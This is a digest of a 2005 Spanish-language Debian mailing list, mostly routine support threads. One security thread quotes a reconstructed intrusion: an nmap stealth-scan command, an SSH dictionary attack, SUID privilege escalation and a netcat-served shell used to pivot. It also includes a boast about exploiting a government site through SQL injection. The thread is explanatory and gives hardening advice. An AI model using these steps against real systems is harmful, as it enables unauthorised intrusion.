date:20050610

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

root wrote:
> hola yo de nuevo lo que pasa es que ya proble ese que tu dices y no
> funciona sigue mandando el mismo error mire he hecho esto edite el
> archivo /etc/squid/squid.conf en la linea donde dice visible_hostname 
> lo puse de dos formas...
> visible_hostname deb
Esta es la correcta...

> visible_hostname = deb
Esta no

> tambien cheque los ficheros smb.conf, hosts y hostname y todo esta bien
No tienen nada que ver,,,

> no encuentro ningun error en los ficheros espero alguien me pueda dar
> otra pista de antemano gracias

Manda tu squid.conf, seguro que algo haces mal.




- --
Ricardo A.Frydman
Consultor en Tecnología Open Source
Administrador de Sistemas
http://www.eureka-linux.com.ar

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFCqg8Tkw12RhFuGy4RAlDUAJ4hGov16it91vrZT8ifxQPitJCLwgCfRIMJ
0Ft4qahiqJ16UqR/3m5m3ao=
=ojDD
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: init 3 no funciona

2005-06-10 Por tema mario

El vie, 10-06-2005 a las 16:35 -0500, Carlos Zuniga escribió:
> Hola, acabo de instalarme la Debian Sarge 3.1r0 con un disco de
> netinst y cuando quiero poner init 3 para reiniciar y luego instalar
> los drivers de nvidia se queda en:
> 
> INIT: Switchig to run level 3
> 
> y de ahi no pasa nada... y el inittab lo veo bien confuso donde está
> para poner el runlevel?


Debes estar siguiendo algún manual para suse o mandrake ya que el
runlevel 3 en debian es GRÁFICO, igual que el 2, 4, 5.

Para que no arranquen las X deberías o desactivar la carga de gdm|kdm|
xdm o arrancar con la opción single. o mejor aún, arrancas como siempre
pulsas Ctrl Alt F1 cuando arranquen las X y ejecutas killall5 para matar
las X.

> 
> -- 
> La actitud del hacker:
> 
> Los hackers resuelven problemas y construyen cosas, y creen en la
> libertad y la ayuda voluntaria mutua. Para ser aceptado como hacker,
> deberás comportarte como si tuvieras esta actitud en tu interior. Y
> para comportarte como si tuvieras esta actitud, deberás creerte de
> verdad dicha actitud.
> http://www.sindominio.net/biblioweb/telematica/hacker-como.html


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: init 3 no funciona

2005-06-10 Por tema david

El 10/06/05, Carlos Zuniga<[EMAIL PROTECTED]> escribió:
> Hola, acabo de instalarme la Debian Sarge 3.1r0 con un disco de netinst y
> cuando quiero poner init 3 para reiniciar y luego instalar los drivers de
> nvidia se queda en:
>  
>  INIT: Switchig to run level 3
Normal, init 3 no reinicia, prueba con init 6 o reboot
 
>  y de ahi no pasa nada... y el inittab lo veo bien confuso donde está para
> poner el runlevel?

En un lugar como este:
# The default runlevel.
id:2:initdefault:


-- 
-
pcbrutal.homelinux.org
chema.mundopc.net
__
NO, a las patentes de software en Europa

Re: init 3 no funciona

2005-06-10 Por tema Roberto MuÃ±oz

Buenas:
yo tuve ese mismo problema
lo que hice fue irme a una consola de texto (crtl+F1) y alli como root
matas en gestor de ventanas que tengas, normalmente gdm o kdm (puedes
verlo con ps aux)

luego para comprobarlo intentas ir a la consola grafica (ctrl+F7) y
solo te deberia de salir un cursor parpadeando.

Pues ahora ya puedes instalar los drivers. Por cierto, no olvides
instalarte los sources de la version exacta del kernel que estas
ejecutando, sino te dara error la instalacion de los drivers.

A parte de eso tranqui que van genial.
Saludos y suerte

El 10/06/05, Carlos Zuniga<[EMAIL PROTECTED]> escribió:
> Hola, acabo de instalarme la Debian Sarge 3.1r0 con un disco de netinst y
> cuando quiero poner init 3 para reiniciar y luego instalar los drivers de
> nvidia se queda en:
>  
>  INIT: Switchig to run level 3
>  
>  y de ahi no pasa nada... y el inittab lo veo bien confuso donde está para
> poner el runlevel?
> 
> -- 
> La actitud del hacker:
> 
> Los hackers resuelven problemas y construyen cosas, y creen en la libertad y
> la ayuda voluntaria mutua. Para ser aceptado como hacker, deberás
> comportarte como si tuvieras esta actitud en tu interior. Y para comportarte
> como si tuvieras esta actitud, deberás creerte de verdad dicha actitud.
> http://www.sindominio.net/biblioweb/telematica/hacker-como.html
>  


-- 
***
Roberto Muñoz GómezNIA: 100039318
Ingeniería Informatica
Universidad Carlos III de Madrid (España)
***
Linux User Number 364964

init 3 no funciona

2005-06-10 Por tema Carlos Zuniga

Hola, acabo de instalarme la Debian Sarge 3.1r0 con un disco de netinst
y cuando quiero poner init 3 para reiniciar y luego instalar los
drivers de nvidia se queda en:

INIT: Switchig to run level 3

y de ahi no pasa nada... y el inittab lo veo bien confuso donde está para poner el runlevel?-- La actitud del hacker:Los
hackers resuelven problemas y construyen cosas, y creen en la libertad
y la ayuda voluntaria mutua. Para ser aceptado como hacker, deberás
comportarte como si tuvieras esta actitud en tu interior. Y para
comportarte como si tuvieras esta actitud, deberás creerte de verdad
dicha actitud.http://www.sindominio.net/biblioweb/telematica/hacker-como.html

Re: DesapariciÃ³n del Panel de Gnome tras actualizaciÃ³n a 2.10.

2005-06-10 Por tema oscar

Hace ya algún tiempo que había instalado el gnome 2.10 y me paso 
exactamente lo mismo
me desapareció el panel de control, pero como generalmente utilizo otro 
shell gráfico no
me importo que desapareciera el panel pero me dejo cierta molestia que 
ocurriera.
Hasta que me canse que estuviera sin panel y me dedique a ver que estaba 
pasando.
Ha si que descubrí que desde la linea de comandos del gnome ejecutando 
el comando

gnome-panel recupere el panel de control del gnome.

Segis escribió:


Hola a todos:

Os cuento, tengo instalada una Debian Sid y hace dos días he
actualizado con synaptic, como hago regularmente, los ficheros o
programas. Hace dos días vi que se introducía en los repositorios (en
concreto es.rediris.es y en ftp.debian.org)la versión 2.10 de Gnome
pero también me dí cuenta de que eran sólo algunos ficheros. Tras
marcar para actualizarlos vi que uno de ellos iba a desinstalar
gnome-core y gnome-panel. A pesar de todo continué con el proceso
puesto que no podía desconfiar de que se desinstalase algo y no
estuviese la alternativa incluida en la actualización. Todo fue bien
pero al reiniciar la máquina vi que tras activar el acceso como usurio
con gdm y al cargar el resto (escritorio, etc.) sólo me aparece en
pantalla el escritorio y han desaparecido tanto el panel superior como
las áreas de trabajo inferiores. Tengo que abrir una terminal para
lanzar cualquier aplicación y hacer lo que antes hacía pero no puedo
minimizar ninguna de ellas porque no encuento lugar para restaurarlas
a su posición inicial.
Por otra parte, he tratado de instalar gnome-panel pero, por una
parte, está en la versión 2.8 y, por otra, me dice que va a
desinstalar un montón de aplicaciones (a lo que no estoy dispuesto, es
decir quitar para después volver a instalarlas).
Hasta ahora mi postura es ir a Debian a ver si hay algún bug o
indicación de que le pase a alguien lo mismo y qué sucede. Por otra,
estoy esperando puesto que parece que están lanzando a cuentagotas las
actualizaciones de la versión 2.10.
Mientras tanto, ¿se os ocurre algo que pueda hacer a parte de lo que
estoy haciendo? He observado tambien que cuando carga la ventana de
Debian antes de presentar el escritorio entre los icono y las
aplicaciones que carga sí está el icono del panel, pero no pone debajo
el nombre de la aplicación (como en otros casos Metacity, etc.)
Un saludo y espero algún comentario.
Segismundo


 




--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Debian no detecta la tabla de particiones

2005-06-10 Por tema David

Hola Lista  

Recurro a ustedes esta vez ya que estoy instalando Debian Sarge 3.1 desde cd 
en una maquina:
Cuando inicio con el cd escribo
boot: linux26
Hasta ahi va muy bien  pero cuando voy al particionado no se detectan 
correctamente mis particiones.
Es decir las mostraba así
hda1 (9.8GB)
hda5 (5.5GB) ext3
hda7(37GB)ext2
hda8(1GB)swap

Cosa que es erronea pues mi disco duro esta dividido así 
hda1(13)GB vfat (aqui tengo windowsxp)
hda5(15)GB vfat (aquí tengo un particion de almacenamietno de datos para 
window)
hda6(1)GB swap
hda7(7)GB ext3(aquí tenia antes mandrake )

Esto si que está raro pues no hubo ni mas alla ni mas aca ni forma que 
reconociera bien las particiones esto tambien me paso una vez a la hora de 
instalar 
Mandrake cuando quise ponerle el kernel 2.6.x bueno me tuve que dar por 
vencido 
y instalar con el de la rama 2.4.26 que es el que estoy usando pues el otro 
ni manera.
Creo que ya tengo porque me daba el kernel panic cuando intentaba arrancar el 
kernel ya que como va a montar / si no reconoce bien las particiones 
Por ultimo he hecho esto 

boot: linux26 hda=19158,16,255 pero nada de nada.


Un saludo y en espera de su ayuda
David




-- 
***
David Acuña Marrero
Estudiante Informática 
IPI Lázaro Cárdenas del Río
GRUPO DE ELABORACION DE SOFTWARE
E_Mail: [EMAIL PROTECTED]
   [EMAIL PROTECTED]
Web: www.davidacu.galeon.com
Usuario de Linux Registrado:384719 
GNU\Linux LA MEJOR MANERA DE CREAR UN MUNDO MEJOR



__
Renovamos el Correo Yahoo!
Nuevos servicios, más seguridad
http://correo.yahoo.es

Re: Servidor POP3

2005-06-10 Por tema Mauro Habbaby

El vie, 10-06-2005 a las 15:55 -0400, Danny Rojas Barría escribió:
> Entonces ninguno...
> 
> Danny R.
> 
> Fernando Quil wrote: 
> > me refiero a algun sendmail.u otro
> > 
> > On 6/9/05, Danny Rojas Barría <[EMAIL PROTECTED]> wrote:
> >   
> > > Como pop3 ninguno, solo tengo el Exim4 para enviar mails
> > > Por eso quiero saber q server pop3 es bueno :D
> > > 
> > > Gracias
> > > 
> > > Danny R.
> > > Chile
> > > 
> > > Fernando Quil wrote:
> > > 
> > > 
> > > > QUE SERVER DE CORREO.TIENES FUNCIONANDO
> > > > 
> > > > 
> > > > 
> > > > On 6/9/05, Danny Rojas Barría <[EMAIL PROTECTED]> wrote:
> > > >  
> > > > 
> > > >   
> > > > > Hola listeros,
> > > > > 
> > > > > Actualmente tengo corriendo un Exim4 como SMTP, me gustaria tambien
> > > > > montar el servicio POP3, cual me recomiendan?
> > > > > 
> > > > > Gracias.
> > > > > 
> > > > > Danny R.
> > > > > Chile
> > > > > 
> > > > > 
> > > > > --
> > > > > To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> > > > > with a subject of "unsubscribe". Trouble? Contact
> > > > > 
> > > [EMAIL PROTECTED]
> > > 
> > > > >
> > > > > 
> > > > > 
> > > > 
> > > >   
> > > 
> > > 
> > 
> >   
> 
Como que ninguno??!! Estan hablando en serio?


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: sonido

2005-06-10 Por tema Fernando


Alejandro Adgi Romano wrote:


hola que tal
me llamo alejandro y quisiera saber como configuro mi tarjeta de sonido
con que comando
muchas gracias por su atencion

_
MSN Amor: busca tu ½ naranja http://latam.msn.com/amor/



#alsaconf


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: servidor squid

2005-06-10 Por tema root

hola yo de nuevo lo que pasa es que ya proble ese que tu dices y no
funciona sigue mandando el mismo error mire he hecho esto edite el
archivo /etc/squid/squid.conf en la linea donde dice visible_hostname 
lo puse de dos formas...
visible_hostname deb
visible_hostname = deb

tambien cheque los ficheros smb.conf, hosts y hostname y todo esta bien
no encuentro ningun error en los ficheros espero alguien me pueda dar
otra pista de antemano gracias


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

sonido

2005-06-10 Por tema Alejandro Adgi Romano


hola que tal
me llamo alejandro y quisiera saber como configuro mi tarjeta de sonido
con que comando
muchas gracias por su atencion

_
MSN Amor: busca tu ½ naranja http://latam.msn.com/amor/


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Servidor POP3

2005-06-10 Por tema Danny Rojas Barría





Entonces ninguno...

Danny R.

Fernando Quil wrote:

  me refiero a algun sendmail.u otro

On 6/9/05, Danny Rojas Barría <[EMAIL PROTECTED]> wrote:
  
  
Como pop3 ninguno, solo tengo el Exim4 para enviar mails
Por eso quiero saber q server pop3 es bueno :D

Gracias

Danny R.
Chile

Fernando Quil wrote:



  QUE SERVER DE CORREO.TIENES FUNCIONANDO



On 6/9/05, Danny Rojas Barría <[EMAIL PROTECTED]> wrote:
 

  
  
Hola listeros,

Actualmente tengo corriendo un Exim4 como SMTP, me gustaria tambien
montar el servicio POP3, cual me recomiendan?

Gracias.

Danny R.
Chile


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact

  

[EMAIL PROTECTED]

Re: Opiniones ?... Seguridad/hacking-.

2005-06-10 Por tema SimÃ³n Pena

Espero no haber llegado demasiado tarde :(. Si quieres saber qué
ocurrió en tu servidor, y todavía no reinstalaste nada, plantéate
hacer un análisis forense. Hay herramientas, tipo tct (The coroner's
toolkit) o autopsy, creo que era otra, que te permitirán "desborrar"
tu disco duro, con lo que podrías recuperar los archivos de log.
También podrías analizar binarios, comprobar si crearon nuevos
usuarios para ver si quedó algo en sus directorios home, podrías
buscar directorios ocultos en tu sistema donde pudiesen haber
descargado los archivos que usaron como exploits...
Hubo una especie de concurso hace poco, os paso el link [1], donde
precisamente se ponía a disposición del público una serie de imágenes
de disco de un "honey pot" que cumplió su objetivo, esto es, fue
atacado. El concurso proponía intentar descubrir todo lo posible
acerca del asalto. Bueno, os dejo que voy a cenar :)

[1] http://www.seguridad.unam.mx/eventos/reto/

Re: Opiniones ?... Seguridad/hacking-.

2005-06-10 Por tema navickator shadow

Hola.

Bueno, observando las versiones de software de tu servidor
podemos hacernos una idea de que el intruso no tubo mayores
problemas para comprometer tu servidor.

Como lo comentaron antes lo que hice fue narrar una historia
sencilla, que viéndolo bien de pronto no fue así :) :)

Bueno, ahora que te pusieron atrabajar y tienes que montar otra vez
el sistema intenta hacerlo bien desde el inicio.
Primero que todo debes preguntarte que servicios quieres ofrecer
en tu servidor y porque?
Sera realmente necesario el ftp?
cuantos usuarios tendrá el sistema?
por que no implementar un ftp con socket seguro?

es necesario el http?
que módulos debe tener instalados?
utiliza algún lenguaje del lado del servidor?
utilizas alguna base de datos?

dependiendo de que servicios quieres montar, haces un particionamiento
de disco adecuado, auque no lo creas esto te permite asegurar de
una manera grandiosa tu servidor, debian ofrece al momento de la instalación
una manera fantástica para particionar y colocar quotas de grupo de usuario
programas con suid, ejecución de programas. un montón de cosas
por ejemplo podrías crear una partición para /tmp la cual no permita ejecución
de guiones ni de nada.
luego de esto debes pensar en cual es el demonio adecuado y como centralizar
la autenticación de los usuarios.
No instales programas que no utilizaras en un servidor: juegos, suite de ofimática
soporte para algunos lenguajes, compiladores y demás... esto puede ser el quiebre
de tu sistema en algún momento.

Si lees el manual de seguridad de DEBIAN, encontraras varias formas
de fortalecer tu sistema.

Bueno, cambiando de tema te voy a dar un consejo, si me lo permites claro esta!

NUNCA te confíes de un firewall, en la mayoría de veces no sirve para nada.
Muchos administradores se confían en sus reglas de firewall y dejan de lado las aplicaciones
de sus sistema.
ejemplo:conocí un sistema del gobierno de un lejano país que tenia todas las reglas de seguridad
que tu quieras... hahaha que patético, era tan facil acceder a sus datos que pu. El problema
un error en la programación, errores de SQLinjection XSS

Esto lo digo para que lo pienses, preocupate por tus desarrollos y de esta forma
tu sistema sera más seguro.

Bueno, para terminar, siempre mira tus logs y guardarlos en cintas o algo similar.

Saludos

Re: PostgreSQL GUI

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Nelson David Sandoval López wrote:
> Debian Sarge ya como estable posee a PostgreSQL 7.4. y deseo utilizar el
> 8.0.3 pero no se que sources colocar para que extraiga directamente ese
> paquete del sitio de postgresql
Se me ocurren 3 caminos:

1) Bajar de ftp://ftp3.ca.postgresql.org/pub/binary/v8.0.3/linux/rpms
los rpms e intentar instalarlos con alien (ignoro si funciona)
2) Bajarte los fuentes y compilarlos en tu sistema (seguro te funcionara)
3) # deb http://http.us.debian.org/debian/ ../project/experimental main
contrib non-free

# Matches:
courier-authlib-postgresql 0.56-0.2 (i386)
odbc-postgresql 1:08.00.0101-1 (i386)
postgresql 7.5.2 (all)
postgresql-7.4 1:7.4.8-3 (i386)
postgresql-8.0 8.0.3-1 (i386)

(PD: Yo optaria por la 2...)

Saludos y avisa como te fue!

- --
Ricardo A.Frydman
Consultor en Tecnología Open Source
Administrador de Sistemas
http://www.eureka-linux.com.ar

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFCqeJgkw12RhFuGy4RAkC8AJkBNTn1TFZzKAapt80HAWlPDSM0zACffTE/
0RGbiDbGuVFYex4ygqr4iJQ=
=86ob
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: como cargar modules?

2005-06-10 Por tema consultores


Pedro

Gracias por responder, el asunto es que he probado todo lo que he 
encontrado y me han sugerido, y ahora creo que tengo una ensalada y no 
se como corregir eso, asi que quisiera empezar a instalar de 0.


Si me puedes ayudar te lo agradecere mucho. No tengo conocimientos 
previos! asi que fallo en cosas muy elementales.


Consultores Agropecuarios

Pedro Pozuelo wrote:


On 6/10/05, consultores <[EMAIL PROTECTED]> wrote:
 


Hola Pedro

Supongo que tu respuesta no es mal intencionada, pero quiero decirte que
soy el mismo que esta tratando de instalar el USB Adapter DWL-122 al que
tu has respondido anteriormente, pero resulta que lo que busco es como
cargar modulos y esa informacion no esta en las paginas que me sugieres
ya que las he leido anteriormente un minimo de 5 veces cada una, mas
otras decenas de paginas relacionadas, en todo caso yo estoy agradecido
contigo, pero sigo sin encontrar respuesta a cual es el modulo que debo
cargar y como cargarlo? sin eso no puedo continuar por que alli esta mi
problema!

gracias y hasta pronto.

   


Hola, efectivamente mi respuesta no era malintencionada, perdona si ha
sonado así.

Simplemente eché un vistazo por la página de bulma y vi que ahí indica
los módulos que hay que cargar además de una explicación detallada y
un montón de enlaces a otras páginas relacionadas con el tema y pensé
que era un buen punto de partida. Por eso supuse que no la habías
leido.

Una vez más disculpa, y suerte en la busqueda del módulo perdido ;-)


 




--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Opiniones ?... Seguridad/hacking-.

2005-06-10 Por tema Danny Rojas BarrÃa


Ricardo Frydman wrote:


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Nelson wrote:
 


El vie, 10-06-2005 a las 12:05 -0500, navickator shadow escribió:

   


Hola.

Bueno, primero que todo mi sentido pesame por tu servidor
espero que renasca de las cenizas y sea mejor que antes :)

ok, iniciemos, voy a plantear una posibilidad de lo que sucedio
en tu servidor.

el atacante lo primero que realizo fue un scaneo de puertos
desde alguna maquina remota que tal vez ya estaba comprometida
o que tal vez era su maquina real o un proxy... no sabemos
miro los puertos

nmap -sS -sV -O -v -P0 tuip

con esto consiguio pasarte por encima de tu firewall si lo tenias y
obtener 
una lista de los puertos abiertos de tu servidor junto con

las versiones de los demonios que ellos corrian.

ya teniendo esto y observando que tenias el ftp y sshd abiertos 
la tarea que le sigue es buscar en la pagina en internet o en google 
buscando correos electronicos por ejemplo [EMAIL PROTECTED]
...bueno, teniendo estas cuentas y siendo obtimistas de que 
en tu servidor creaste usuarios reales en el sistema y no

en una base de datos y que a ellos le colocaste en la shell /bin/bash
en vez de de /bin/false... el atacante inicia en la busqueda de un
exploit
para tus demonios, si no lo encuentra entonces iniciara un 
ataque de diccionario sobre tus servicios, creo que inicio por
el sshd... suponiendo que despues de varias horas de intentar 
obtuvo una entrada a tu sistema por medio de un

usuariohttp://www.google.com.co/
con una muy mala contraseña... luego el atacante ya tiene una shell
e inicia en la busqueda de errores internos en busqueda de una 
escalada de privilegios, puede buscar programas con SUID o detenerse

y observar en securityfocus.com cientos de errores de seguridad
que puede contener tu sistema.
Suponiendo de despues de varias horas escaneando tu sistema por dentro
y teniendo un exploit local consiguio acceso al root... despues de
este punto
tu maquina ya esta perdida y no hace falta imaginarnos que podria
hacer
con este poder!!!

El script en perl que nombras es muy sencillo.
el recive dos parametros que son los siguiente el nombre del host y su
ip
envia una peticion a dicho puerto de el nombre de la maquina y una
shell
claro que este script no funciona para nada si antes inicialisaste un
puerto
con shell... me explico: esto se haria por ejemplo con netcat, este
permite
crear un demonio que escuche determonado puerto y que cuando el se
conecte
le sirva un determinado archivo, ejemplo /bin/sh

entonces el atacante ejecuta el guion en perl para conectarse a otra
maquina objetivo
conclusion: utiliso tu maquina como puente para atacar otras redes.
claro que podria suponer que es muy novato o un scriptkid ya que
destruyo
tu sistema... yo permaneceria con una cuenta privilegiada en tu
sistema :)

Bueno, creo que eso es todo por el momento... si seme ocurre algomas
estare escribiendo

Saludos.
 




uf
pero si casi parece una conspiracion contra el presidente :o !!!..
   


Bueno, recuerda que lo que leiste arriba, solo es un "relato intentando
reconstruir lo sucedido".puede no ser lo que paso (en realidad no
creo que haya sido asi XD)

 


esos parametros de nmap nos los conocia y me parecieron bastante
interesantes y asombrosos.. mas bien. preocupante diria yo..
   


Depende como configures tu firewall...

 


que hacer ante un caso como este ?... de que forma se podria prevenir
este tipo de scaneos en un sistema ?...
   


Configurando adecuadamente tu firewall para prevenirte contra ese tipo
de escaneos + otras herramientas de deteccion, aunque dudo que lo
necesites, si me lo preguntas...

 


que preocupante poder ver este tipo de accion. y ver que no basta con
las posibles "soluciones de seguridad" que se implementen siempre habra
algo que logre saltar un sistema =/...
   


Bueno, es cuestion de reducir posibilidades...como te conteste recien en
otro correo, creo que dejaste las cosas demasiado al azar por decirlo de
algun modo...

 


salu2 y en este mismo momento me dispongo a reeleer el manual de
iptables para mejorar el firewall de aquella empresa...
   


Puedes leer tambien:
http://www.debian.org/doc/manuals/securing-debian-howto/ch1.es.html

 


consejos ?..
   


Ahi fue uno...
Otro: olvida la paranoia, que te sirva para el futuro

 

   




- --
Ricardo A.Frydman
Consultor en Tecnología Open Source
Administrador de Sistemas
http://www.eureka-linux.com.ar

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFCqdxZkw12RhFuGy4RAu3lAJoC1v36CjU63uwj6Vq8VkacmMHkigCfaZCd
9M9W04rQ/QSkeAkNjw1uvPA=
=vKmw
-END PGP SIGNATURE-


 


No seria malo que el sistema te enviara los logs al correo

Saludos compatriota...

Danny R.


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Opiniones ?... Seguridad/hacking-.

El vie, 10-06-2005 a las 15:38 -0300, Ricardo Frydman escribió:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> Nelson wrote:
> > Muchas gracias por los consejos y lo de la paranoia quisas si entre un
> > poco en panico.. pero como dices la guardare para el futuro.. ahora me
> > dedicare a robustecer el firewall :-)...
> Que distribucion piensas instalar? ;)

Por Supuesto que Debian =)..

en realidad yo soy un debianero hace mucho tiempo.. pero ese servidor no
es mio..

solo estoy ayudando =).. 

> 
> > 
> > muchas gracias..
> > 
> > 



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Opiniones ?... Seguridad/hacking-.

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Nelson wrote:
> Muchas gracias por los consejos y lo de la paranoia quisas si entre un
> poco en panico.. pero como dices la guardare para el futuro.. ahora me
> dedicare a robustecer el firewall :-)...
Que distribucion piensas instalar? ;)

> 
> muchas gracias..
> 
> 


- --
Ricardo A.Frydman
Consultor en Tecnología Open Source
Administrador de Sistemas
http://www.eureka-linux.com.ar

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFCqd4Ukw12RhFuGy4RAhpLAKCAO7Nhbu9CTIuNauS4JKHMNMUCYwCeMjD3
Fnw6RMNwv2TdiVruzwL92UM=
=0jw/
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Opiniones ?... Seguridad/hacking-.

El vie, 10-06-2005 a las 15:30 -0300, Ricardo Frydman escribió:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> Nelson wrote:
> > El vie, 10-06-2005 a las 12:05 -0500, navickator shadow escribió:
> > 
> >>Hola.
> >>
> >>Bueno, primero que todo mi sentido pesame por tu servidor
> >>espero que renasca de las cenizas y sea mejor que antes :)
> >>
> >>ok, iniciemos, voy a plantear una posibilidad de lo que sucedio
> >>en tu servidor.
> >>
> >>el atacante lo primero que realizo fue un scaneo de puertos
> >>desde alguna maquina remota que tal vez ya estaba comprometida
> >>o que tal vez era su maquina real o un proxy... no sabemos
> >>miro los puertos
> >>
> >>nmap -sS -sV -O -v -P0 tuip
> >>
> >>con esto consiguio pasarte por encima de tu firewall si lo tenias y
> >>obtener 
> >>una lista de los puertos abiertos de tu servidor junto con
> >>las versiones de los demonios que ellos corrian.
> >>
> >>ya teniendo esto y observando que tenias el ftp y sshd abiertos 
> >>la tarea que le sigue es buscar en la pagina en internet o en google 
> >>buscando correos electronicos por ejemplo [EMAIL PROTECTED]
> >>...bueno, teniendo estas cuentas y siendo obtimistas de que 
> >>en tu servidor creaste usuarios reales en el sistema y no
> >>en una base de datos y que a ellos le colocaste en la shell /bin/bash
> >>en vez de de /bin/false... el atacante inicia en la busqueda de un
> >>exploit
> >>para tus demonios, si no lo encuentra entonces iniciara un 
> >>ataque de diccionario sobre tus servicios, creo que inicio por
> >>el sshd... suponiendo que despues de varias horas de intentar 
> >>obtuvo una entrada a tu sistema por medio de un
> >>usuariohttp://www.google.com.co/
> >>con una muy mala contraseña... luego el atacante ya tiene una shell
> >>e inicia en la busqueda de errores internos en busqueda de una 
> >>escalada de privilegios, puede buscar programas con SUID o detenerse
> >>y observar en securityfocus.com cientos de errores de seguridad
> >>que puede contener tu sistema.
> >>Suponiendo de despues de varias horas escaneando tu sistema por dentro
> >>y teniendo un exploit local consiguio acceso al root... despues de
> >>este punto
> >>tu maquina ya esta perdida y no hace falta imaginarnos que podria
> >>hacer
> >>con este poder!!!
> >>
> >>El script en perl que nombras es muy sencillo.
> >>el recive dos parametros que son los siguiente el nombre del host y su
> >>ip
> >>envia una peticion a dicho puerto de el nombre de la maquina y una
> >>shell
> >>claro que este script no funciona para nada si antes inicialisaste un
> >>puerto
> >>con shell... me explico: esto se haria por ejemplo con netcat, este
> >>permite
> >>crear un demonio que escuche determonado puerto y que cuando el se
> >>conecte
> >>le sirva un determinado archivo, ejemplo /bin/sh
> >>
> >>entonces el atacante ejecuta el guion en perl para conectarse a otra
> >>maquina objetivo
> >>conclusion: utiliso tu maquina como puente para atacar otras redes.
> >>claro que podria suponer que es muy novato o un scriptkid ya que
> >>destruyo
> >>tu sistema... yo permaneceria con una cuenta privilegiada en tu
> >>sistema :)
> >>
> >>Bueno, creo que eso es todo por el momento... si seme ocurre algomas
> >>estare escribiendo
> >>
> >>Saludos.
> > 
> > 
> > 
> > 
> > uf
> > pero si casi parece una conspiracion contra el presidente :o !!!..
> Bueno, recuerda que lo que leiste arriba, solo es un "relato intentando
> reconstruir lo sucedido".puede no ser lo que paso (en realidad no
> creo que haya sido asi XD)
> 
> > esos parametros de nmap nos los conocia y me parecieron bastante
> > interesantes y asombrosos.. mas bien. preocupante diria yo..
> Depende como configures tu firewall...
> 
> > que hacer ante un caso como este ?... de que forma se podria prevenir
> > este tipo de scaneos en un sistema ?...
> Configurando adecuadamente tu firewall para prevenirte contra ese tipo
> de escaneos + otras herramientas de deteccion, aunque dudo que lo
> necesites, si me lo preguntas...
> 
> > que preocupante poder ver este tipo de accion. y ver que no basta con
> > las posibles "soluciones de seguridad" que se implementen siempre habra
> > algo que logre saltar un sistema =/...
> Bueno, es cuestion de reducir posibilidades...como te conteste recien en
> otro correo, creo que dejaste las cosas demasiado al azar por decirlo de
> algun modo...
> 
> > salu2 y en este mismo momento me dispongo a reeleer el manual de
> > iptables para mejorar el firewall de aquella empresa...
> Puedes leer tambien:
> http://www.debian.org/doc/manuals/securing-debian-howto/ch1.es.html
> 
> > consejos ?..
> Ahi fue uno...
> Otro: olvida la paranoia, que te sirva para el futuro
> 



Muchas gracias por los consejos y lo de la paranoia quisas si entre un
poco en panico.. pero como dices la guardare para el futuro.. ahora me
dedicare a robustecer el firewall :-)...

muchas gracias..


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL P

Re: Opiniones ?... Seguridad/hacking-.

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Nelson wrote:
> El vie, 10-06-2005 a las 12:05 -0500, navickator shadow escribió:
> 
>>Hola.
>>
>>Bueno, primero que todo mi sentido pesame por tu servidor
>>espero que renasca de las cenizas y sea mejor que antes :)
>>
>>ok, iniciemos, voy a plantear una posibilidad de lo que sucedio
>>en tu servidor.
>>
>>el atacante lo primero que realizo fue un scaneo de puertos
>>desde alguna maquina remota que tal vez ya estaba comprometida
>>o que tal vez era su maquina real o un proxy... no sabemos
>>miro los puertos
>>
>>nmap -sS -sV -O -v -P0 tuip
>>
>>con esto consiguio pasarte por encima de tu firewall si lo tenias y
>>obtener 
>>una lista de los puertos abiertos de tu servidor junto con
>>las versiones de los demonios que ellos corrian.
>>
>>ya teniendo esto y observando que tenias el ftp y sshd abiertos 
>>la tarea que le sigue es buscar en la pagina en internet o en google 
>>buscando correos electronicos por ejemplo [EMAIL PROTECTED]
>>...bueno, teniendo estas cuentas y siendo obtimistas de que 
>>en tu servidor creaste usuarios reales en el sistema y no
